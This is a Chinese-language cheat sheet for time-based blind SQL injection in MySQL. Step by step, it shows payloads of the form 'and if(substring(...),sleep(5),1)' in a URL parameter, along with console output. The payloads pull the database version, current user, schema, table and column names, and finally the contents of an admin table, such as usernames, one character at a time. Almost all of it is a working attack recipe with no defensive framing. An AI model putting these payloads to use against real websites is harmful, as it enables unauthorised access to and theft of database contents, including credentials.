0x00 记忆方式

and if(substring(表达式,1,1)=判断条件 ,sleep(5),1);

0x01 基本数据

  1. mysql> select version();
  2. +-----------+
  3. | version() |
  4. +-----------+
  5. | 5.5.53 |
  6. +-----------+
  7. 1 row in set (0.27 sec)
  8. mysql> select user();
  9. +----------------+
  10. | user() |
  11. +----------------+
  12. | root@localhost |
  13. +----------------+
  14. 1 row in set (0.00 sec)
  15. mysql> select database();
  16. +------------+
  17. | database() |
  18. +------------+
  19. | test |
  20. +------------+
  21. 1 row in set (0.00 sec)

0x02 获取数据长度

  1. mysql> select length(user());
  2. +----------------+
  3. | length(user()) |
  4. +----------------+
  5. | 14 |
  6. +----------------+
  7. 1 row in set (0.00 sec)

web语句: http://www.test.com/sql.php?id=1+and if(length(user())=14,sleep(5),1)

数据库语句: select * from test where id = 1 and if(length(user())=14,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(length(user())=14,sleep(5),1);
  2. Empty set (5.00 sec)

0x03 读取数据库版本/当前连接用户/当前连接的数据库

注意: 读取不同的内容
例如:
substring(user(),1,1) = r
substring(user(),2,1) = o

数据库语句: select * from test where id = 1 and if(substring(user(),1,1)=’r’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring(user(),1,1)='r',sleep(5),1);
  2. Empty set (5.00 sec)

猜对时会延时5秒,一旦延时了5S就可以判断为猜对了

0x04 猜库名

注意: LIMIT 0 修改会显示其他库名
例如:
LIMIT 0,1 修改为0 就是出1库
LIMIT 1,1 修改为1 就是出2库

  1. // 演示数据
  2. mysql> SELECT schema_name FROM information_schema.schemata LIMIT 0,1;
  3. +--------------------+
  4. | schema_name |
  5. +--------------------+
  6. | information_schema |
  7. +--------------------+
  8. 1 row in set (0.00 sec)

读取1库库名第一个字: select * from test where id = 1 and if(substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)=’i’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),1,1)='i',sleep(5),1);
  2. Empty set (5.00 sec)

读取1库库名第二个字: select * from test where id = 1 and if(substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),2,1)=’n’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((SELECT schema_name FROM information_schema.schemata LIMIT 0,1),2,1)='n',sleep(5),1);
  2. Empty set (5.00 sec)

0x05 猜表名

注意: table_schema=xxx 修改为其他库会爆出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据

注意: LIMIT 0 修改会爆出不同的表名
例如:
LIMIT 0,1 修改为0 就是出1表
LIMIT 1,1 修改为1 就是出2表

  1. // 演示数据
  2. mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1;
  3. +------------+
  4. | table_name |
  5. +------------+
  6. | tdb_admin |
  7. +------------+
  8. 1 row in set (0.00 sec)

数据库语句-读取当前库的第一张表名的第一个字: select * from test where id = 1 and if(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1)=’t’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),1,1)='t',sleep(5),1);
  2. Empty set (5.00 sec)

数据库语句-读取当前库的第一张表名的第二个字: select * from test where id = 1 and if(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),2,1)=’d’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1),2,1)='d',sleep(5),1);
  2. Empty set (5.00 sec)

0x06 猜字段

table_schema = “xx” 要爆的数据库名
table_name = “xx” 要爆的表名

limit 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password

  1. // 演示数据
  2. mysql> SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1;
  3. +-------------+
  4. | column_name |
  5. +-------------+
  6. | id |
  7. +-------------+
  8. 1 row in set (0.00 sec)

猜test库 tdb_admin表的第一个字段名第一个字: select * from test where id = 1 and if(substring((SELECT column_name FROM information_schema.columns where table_schema=’test’ and table_name=’tdb_admin’ limit 0,1),1,1)=’i’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1),1,1)='i',sleep(5),1);
  2. Empty set (5.00 sec)

猜test库 tdb_admin表的第一个字段名第二个字: select * from test where id = 1 and if(substring((SELECT column_name FROM information_schema.columns where table_schema=’test’ and table_name=’tdb_admin’ limit 0,1),2,1)=’d’,sleep(5),1);

0x07 猜内容

注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条

  1. mysql> SELECT username FROM test.tdb_admin limit 0,1;
  2. +----------+
  3. | username |
  4. +----------+
  5. | admin |
  6. +----------+
  7. 1 row in set (0.00 sec)

读取某库某表某字段第一个字: select * from test where id = 1 and if(substring((SELECT 字段名 FROM 库名.表名 limit 0,1),1,1)=’a’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((SELECT username FROM test.tdb_admin limit 0,1),1,1)='a',sleep(5),1);
  2. Empty set (5.00 sec)

读取某库某表某字段第二字: select * from test where id = 1 and if(substring((SELECT 字段名 FROM 库名.表名 limit 0,1),2,1)=’a’,sleep(5),1);

  1. mysql> select * from test where id = 1 and if(substring((SELECT username FROM test.tdb_admin limit 0,1),2,1)='d',sleep(5),1);
  2. Empty set (5.00 sec)